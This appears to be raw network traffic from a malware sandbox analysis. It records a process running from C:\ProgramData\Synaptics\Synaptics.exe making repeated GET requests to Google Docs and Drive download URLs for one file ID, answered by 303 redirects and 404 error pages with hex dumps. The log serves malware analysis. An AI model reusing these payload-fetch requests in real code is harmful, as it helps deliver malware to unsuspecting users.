                                                                                                                                                                            2024-12-30 10:49:33 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            81192.168.2.849841142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:33 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:33 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-D2QQQuYHirXfNFYsPeiRvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            82192.168.2.849844142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:34 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:34 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-34lTXDaVuxNZnFY7u4T9YQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            83192.168.2.849845142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:34 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:34 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-9xtmTnx0tdQZhEXa_5DKkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            84192.168.2.849846142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:34 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:34 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6eLmT1qhSR7aKdwAqkyVNEciZxcL5P_SWOy0LNYQoji3sXccAL8p2Kr8DoeAM39O4L
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:34 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-6UlqBSHfNZDUIY2AG_ls9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:34 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:34 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 4c 5f 59 5f 74 71 7a 55 6c 59 78 53 66 34 41 2d 55 44 4b 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="rL_Y_tqzUlYxSf4A-UDKfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:34 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            85192.168.2.849847142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:34 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:34 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5IOqhIUp7Uw-16rJzbrIGZv2vQfEjG3ZHBKwUSHGRqzeeH8YdlkFja2ybPbJNrsBBY
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:34 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-S8MsMFEcalqjWn9HWJ5rQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:34 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:34 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 4b 4f 6c 78 51 73 54 32 65 6a 59 44 57 4d 77 52 4f 43 63 35 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="gKOlxQsT2ejYDWMwROCc5A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:34 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            86192.168.2.849849142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:35 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            87192.168.2.849848142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:35 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:35 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-4IpSdMr5T0OOi1i4oaGi5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            88192.168.2.849850142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            89192.168.2.849851142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            90192.168.2.849854142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:36 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:36 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC61pQVVNa3vxqZPAlo0auJ9JiKvd_6j3JrQbOF4iNecks9NJUje_kF-gzk8HZxySJKFwEwV41Y
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:36 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-IkRyUo5EmdZJxsmX14raSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
